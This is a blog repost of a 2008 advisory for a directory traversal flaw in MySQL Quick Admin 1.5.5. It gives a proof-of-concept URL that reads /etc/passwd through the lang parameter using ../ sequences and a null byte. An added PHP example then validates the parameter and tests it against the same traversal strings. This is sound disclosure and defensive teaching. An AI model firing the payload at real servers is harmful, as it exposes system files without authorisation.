SecurityGyan

Author Archive

MySqlQuickAdmin Directory Traversal Exploit

by Vinod Sharma on May.03, 2009, under MyHacks

###############################################################################
Directory traversal vulnerability in MySQL Quick Admin 1.5.5 allows remote attackers to read and execute arbitrary files via a .. (dot dot) in the lang parameter to actions.php.

Published at milw0rm: http://www.milw0rm.com/exploits/7020

###############################################################################

POC: http://www.example.com/quickadmin/actions.php?act=27&do=lang?=../../../../../../../../../../etc/passwd%00

###############################################################################
References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4454

http://secunia.com/advisories/31820

###############################################################################

# milw0rm.com [2008-11-06]
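
The mitigation for this class of bug is to stop treating the lang value as a path. The following is an added example, not code from the original post or from MySQL Quick Admin: the function name `resolve_lang_file`, the one-file-per-language layout and the sample values are assumptions made for illustration.

```php
<?php
// Added example: hypothetical hardened handling of a "lang" request value.

/** Return the language file for $requested inside $langDir, or null. */
function resolve_lang_file($requested, string $langDir): ?string
{
    // ?lang[]=x arrives as an array; only plain strings are acceptable.
    if (!is_string($requested)) {
        return null;
    }
    // Allowlist a short identifier. Dots, slashes, backslashes and NUL bytes
    // all fail here, so "../" and a decoded %00 never reach the filesystem.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $requested)) {
        return null;
    }
    $base = realpath($langDir);
    $path = realpath($langDir . '/' . $requested . '.php');
    if ($base === false || $path === false) {
        return null; // no such language file
    }
    // Defence in depth: the resolved path must stay under the language
    // directory even if a symlink was planted inside it.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo data: a temporary language directory with one file.
$dir = sys_get_temp_dir() . '/lang_demo_' . getmypid();
mkdir($dir);
file_put_contents("$dir/english.php", "<?php // constructed sample\n");

$samples = [
    'english',                      // valid identifier with a matching file
    "../../../../etc/passwd\0",     // traversal plus NUL byte
    '..%2f..%2fetc%2fpasswd',       // still-encoded traversal
    'english.php',                  // caller-supplied extension
    'klingon',                      // well-formed, but no such file
    ['english'],                    // array instead of string
];
foreach ($samples as $value) {
    $file = resolve_lang_file($value, $dir);
    printf("%-36s => %s\n",
        json_encode($value, JSON_UNESCAPED_SLASHES),
        $file === null ? 'rejected' : 'accepted');
}
unlink("$dir/english.php");
rmdir($dir);
```

A real handler would include only the path this function returns and fall back to a fixed default language when it returns null.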
